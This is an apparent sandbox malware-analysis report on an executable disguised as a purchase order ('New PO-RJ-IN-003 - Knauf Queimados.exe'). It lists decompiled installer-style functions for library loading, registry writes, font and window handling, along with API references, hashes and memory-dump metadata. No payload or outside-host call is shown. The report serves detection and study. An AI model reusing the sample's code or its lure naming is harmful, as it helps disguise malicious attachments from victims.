                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                                                                                          • Instruction ID: 0d48d80f5befc11ac34d32cc8383790a8c4c8cfd5038d7f43494ad221661d07c
                                                                                                                          • Opcode Fuzzy Hash: ffe6b110ca1c73326c48dab4d0f6c0cda1bf7de6d6394e86224bb1024c2cbccb
                                                                                                                          • Instruction Fuzzy Hash: 4D217471A44248BFEF01AFB4CD8AAAE7B75EF44344F14417AF501B61D1D6788940DB19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004057EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004057EE(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                          0x004057ef
                                                                                                                          0x00405806
                                                                                                                          0x0040580e
                                                                                                                          0x0040580e
                                                                                                                          0x00405816

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057F4
                                                                                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040323C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 004057FD
                                                                                                                          • lstrcatA.KERNEL32(?,00409010), ref: 0040580E
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 2659869361-823278215
                                                                                                                          • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction ID: a73f37ca2c4469ddb4ae9c1577b37cdaede3e1835012dc8acebf0dfdd4a4e987
                                                                                                                          • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                          • Instruction Fuzzy Hash: 86D0A962615A703EE21236559C09F8B2A0CCF82700B14C833F600B22E2C63C5D41CFFE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401F67 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 59%
                                                                                                                          			E00401F67(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424038");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x424008 =  *0x424008 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A0C(0xfffffff0);
				 *(_t34 + 8) = E00402A0C(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404FE7(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b050, 0x409000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004036EE(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                                                                                          0x00401f67
                                                                                                                          0x00401f67
                                                                                                                          0x00401f6c
                                                                                                                          0x00401f73
                                                                                                                          0x0040202f
                                                                                                                          0x0040217a
                                                                                                                          0x0040217a
                                                                                                                          0x004028a1
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0
                                                                                                                          0x004028b0
                                                                                                                          0x00401f82
                                                                                                                          0x00401f8c
                                                                                                                          0x00401f8f
                                                                                                                          0x00401f9e
                                                                                                                          0x00401fa8
                                                                                                                          0x00401fac
                                                                                                                          0x00402028
                                                                                                                          0x00000000
                                                                                                                          0x00402028
                                                                                                                          0x00401fae
                                                                                                                          0x00401fb8
                                                                                                                          0x00401fbc
                                                                                                                          0x00402000
                                                                                                                          0x00401fbe
                                                                                                                          0x00401fc1
                                                                                                                          0x00401fc4
                                                                                                                          0x00401ff4
                                                                                                                          0x00401fc6
                                                                                                                          0x00401fc9
                                                                                                                          0x00401fd2
                                                                                                                          0x00401fd4
                                                                                                                          0x00401fd4
                                                                                                                          0x00401fd2
                                                                                                                          0x00401fc4
                                                                                                                          0x00402008
                                                                                                                          0x0040201d
                                                                                                                          0x0040201d
                                                                                                                          0x00000000
                                                                                                                          0x00402008
                                                                                                                          0x00401f98
                                                                                                                          0x00401f9c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F92
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000,?), ref: 00405020
                                                                                                                            • Part of subcall function 00404FE7: lstrlenA.KERNEL32(00402C60,0041FD58,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C60,00000000), ref: 00405030
                                                                                                                            • Part of subcall function 00404FE7: lstrcatA.KERNEL32(0041FD58,00402C60,00402C60,0041FD58,00000000,00000000,00000000), ref: 00405043
                                                                                                                            • Part of subcall function 00404FE7: SetWindowTextA.USER32(0041FD58,0041FD58), ref: 00405055
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040507B
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405095
                                                                                                                            • Part of subcall function 00404FE7: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050A3
                                                                                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA2
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB2
                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2987980305-0
                                                                                                                          • Opcode ID: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                                                                                          • Instruction ID: 03d8e5a468c8d4f9f4276292500c9ce54345415f5676ade893a4261965153270
                                                                                                                          • Opcode Fuzzy Hash: 7fb9b226615727d3441864a5fc6923e543d9c096b6fd48025687a41fa8be44d0
                                                                                                                          • Instruction Fuzzy Hash: 8E210B32904115BBDF207F65CE8CA6E39B1BF44358F20423BF601B62D0DBBD49419A5E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402319 Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00402319(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B01(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A0C(2);
				_t18 = E00402A0C(0x11);
				_t31 =  *0x424030 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x424030 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A0C(0x23);
						_t19 = lstrlenA(0x40a450) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029EF(3);
						 *0x40a450 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F2E(_t31,  *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a450, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a450, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x424008 =  *0x424008 +  *(_t37 - 4);
				return 0;
			}










                                                                                                                          0x0040231a
                                                                                                                          0x0040231f
                                                                                                                          0x00402329
                                                                                                                          0x00402333
                                                                                                                          0x00402336
                                                                                                                          0x00402346
                                                                                                                          0x00402350
                                                                                                                          0x00402357
                                                                                                                          0x0040235f
                                                                                                                          0x0040236d
                                                                                                                          0x00402371
                                                                                                                          0x0040237c
                                                                                                                          0x0040237c
                                                                                                                          0x00402380
                                                                                                                          0x00402384
                                                                                                                          0x0040238a
                                                                                                                          0x0040238f
                                                                                                                          0x0040238f
                                                                                                                          0x00402393
                                                                                                                          0x0040239f
                                                                                                                          0x0040239f
                                                                                                                          0x004023b8
                                                                                                                          0x004023ba
                                                                                                                          0x004023ba
                                                                                                                          0x004023bd
                                                                                                                          0x00402493
                                                                                                                          0x00402493
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402357
                                                                                                                          • lstrlenA.KERNEL32(0040A450,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402377
                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B0
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,0040A450,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402493
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1356686001-0
                                                                                                                          • Opcode ID: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                                                                                          • Instruction ID: ad8ea78d7240695516c5cd5a42f81e191ab97329ebd365d047bf213c76e9c1da
                                                                                                                          • Opcode Fuzzy Hash: 095443195063697bdd456d4cd3d43ce86eee03aab12c67eea5854480753a1108
                                                                                                                          • Instruction Fuzzy Hash: 14113071E00108BEEB10EFB5DE8DEAF7A79EB40358F10403AF905B61D1D6B85D419A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b054->lfHeight =  ~(MulDiv(E004029EF(2), _t6, 0x48));
				 *0x40b064 = E004029EF(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b06b = 1;
				 *0x40b068 = _t11 & 0x00000001;
				 *0x40b069 = _t11 & 0x00000002;
				 *0x40b06a = _t11 & 0x00000004;
				E00405D1D(_t18, _t24, _t26, 0x40b070,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b054);
				_push(_t14);
				_push(_t26);
				E00405C59();
				 *0x424008 =  *0x424008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                          0x00401d29
                                                                                                                          0x00401d42
                                                                                                                          0x00401d4c
                                                                                                                          0x00401d51
                                                                                                                          0x00401d5c
                                                                                                                          0x00401d63
                                                                                                                          0x00401d75
                                                                                                                          0x00401d7b
                                                                                                                          0x00401d80
                                                                                                                          0x00401d8a
                                                                                                                          0x004024ce
                                                                                                                          0x00401561
                                                                                                                          0x00402849
                                                                                                                          0x004028a4
                                                                                                                          0x004028b0

                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D22
                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                          • CreateFontIndirectA.GDI32(0040B054), ref: 00401D8A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3272661963-0
                                                                                                                          • Opcode ID: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                                                                                          • Instruction ID: c086b606221abe62c4a5ea5e4ce8852375084165fd0064a8092653b5abcc508f
                                                                                                                          • Opcode Fuzzy Hash: 8e548603e350ce1a89f038fa1766b34cdc841b1a5af396ce190c880d9480c0eb
                                                                                                                          • Instruction Fuzzy Hash: FAF04471A48240AEE70167709E0AB9B3F64D715305F104476B251B62F2C7790444CBAE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403A17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403A17(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405C72(__ecx, "1033");
				while(1) {
					_t26 =  *0x423fc4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f90 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423fc0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423760 = _t18[1];
					 *0x424028 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42375c = _t23;
						E00405C59(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420558, E00405D1D(_t13, _t24, _t26, 0x423780, 0xfffffffe));
						_t11 =  *0x423fac;
						_t27 =  *0x423fa8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405D1D(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                          0x00403a1b
                                                                                                                          0x00403a20
                                                                                                                          0x00403a26
                                                                                                                          0x00403a2b
                                                                                                                          0x00403a2b
                                                                                                                          0x00403a33
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a3b
                                                                                                                          0x00403a43
                                                                                                                          0x00403a45
                                                                                                                          0x00403a4b
                                                                                                                          0x00403a4b
                                                                                                                          0x00403a4d
                                                                                                                          0x00403a59
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a5d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403a5f
                                                                                                                          0x00403a64
                                                                                                                          0x00403a6d
                                                                                                                          0x00403a73
                                                                                                                          0x00403a78
                                                                                                                          0x00403a8c
                                                                                                                          0x00403a97
                                                                                                                          0x00403aaf
                                                                                                                          0x00403ab5
                                                                                                                          0x00403aba
                                                                                                                          0x00403ac2
                                                                                                                          0x00403ae3
                                                                                                                          0x00403ae3
                                                                                                                          0x00403ae3
                                                                                                                          0x00403ac4
                                                                                                                          0x00403ac6
                                                                                                                          0x00403ac6
                                                                                                                          0x00403aca
                                                                                                                          0x00403ad1
                                                                                                                          0x00403ad1
                                                                                                                          0x00403ad6
                                                                                                                          0x00403adc
                                                                                                                          0x00403adc
                                                                                                                          0x00000000
                                                                                                                          0x00403ac6
                                                                                                                          0x00403a7a
                                                                                                                          0x00403a7f
                                                                                                                          0x00403a88
                                                                                                                          0x00403a81
                                                                                                                          0x00403a81
                                                                                                                          0x00403a81
                                                                                                                          0x00403a7f

                                                                                                                          APIs
                                                                                                                          • SetWindowTextA.USER32(00000000,00423780), ref: 00403AAF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow
                                                                                                                          • String ID: "C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe"$1033
                                                                                                                          • API String ID: 530164218-3835172310
                                                                                                                          • Opcode ID: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                                                                                          • Instruction ID: d2f26ffd722b9fc2ec01e0f6875488dfbe0f51797c7981412bd9696a178e6430
                                                                                                                          • Opcode Fuzzy Hash: bde8280c9c770d58924a074a3110f1818d19584ed3810c5b524036327c9d2aac
                                                                                                                          • Instruction Fuzzy Hash: D511D071B00201ABC720EF149C80A373BA8EB85716369813BE841A73A0D73D9A028E58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404F37 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F37(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420568 != _t22) {
							 *0x420568 = _t22;
							E00405CFB(0x420580, 0x425000);
							E00405C59(0x425000, _t22);
							E0040140B(6);
							E00405CFB(0x425000, 0x420580);
						}
						L11:
						return CallWindowProcA( *0x420570, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004048B6(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404003(0x413);
				return 0;
			}




                                                                                                                          0x00404f43
                                                                                                                          0x00404f68
                                                                                                                          0x00404f88
                                                                                                                          0x00404f8b
                                                                                                                          0x00404f8e
                                                                                                                          0x00404fa5
                                                                                                                          0x00404fab
                                                                                                                          0x00404fb2
                                                                                                                          0x00404fb9
                                                                                                                          0x00404fc0
                                                                                                                          0x00404fc5
                                                                                                                          0x00404fcb
                                                                                                                          0x00000000
                                                                                                                          0x00404fdb
                                                                                                                          0x00404f75
                                                                                                                          0x00404fc8
                                                                                                                          0x00404fc8
                                                                                                                          0x00000000
                                                                                                                          0x00404fc8
                                                                                                                          0x00404f81
                                                                                                                          0x00404f83
                                                                                                                          0x00000000
                                                                                                                          0x00404f83
                                                                                                                          0x00404f49
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404f50
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32 ref: 00404F6D
                                                                                                                          • CallWindowProcA.USER32 ref: 00404FDB
                                                                                                                            • Part of subcall function 00404003: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404015
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                                                                                          • Instruction ID: e5405207afdf9c80724cdb5948ae190fd13b5b366899adbc3f84073b9e1b6582
                                                                                                                          • Opcode Fuzzy Hash: a9a9cd53ea9b16651c68b641742eb392f20282b9ff56190fccbee61235c86997
                                                                                                                          • Instruction Fuzzy Hash: 2A116D71604209BBEF21AF52DD4199B3768AB503A5F00813BFA05791E1C7784992DFAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004036B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004036B9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f53c;
				_t3 = E0040369E(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f53c =  *0x41f53c & 0x00000000;
				return _t3;
			}







                                                                                                                          0x004036ba
                                                                                                                          0x004036c2
                                                                                                                          0x004036c9
                                                                                                                          0x004036cc
                                                                                                                          0x004036cc
                                                                                                                          0x004036ce
                                                                                                                          0x004036d3
                                                                                                                          0x004036da
                                                                                                                          0x004036e0
                                                                                                                          0x004036e4
                                                                                                                          0x004036e5
                                                                                                                          0x004036ed

                                                                                                                          APIs
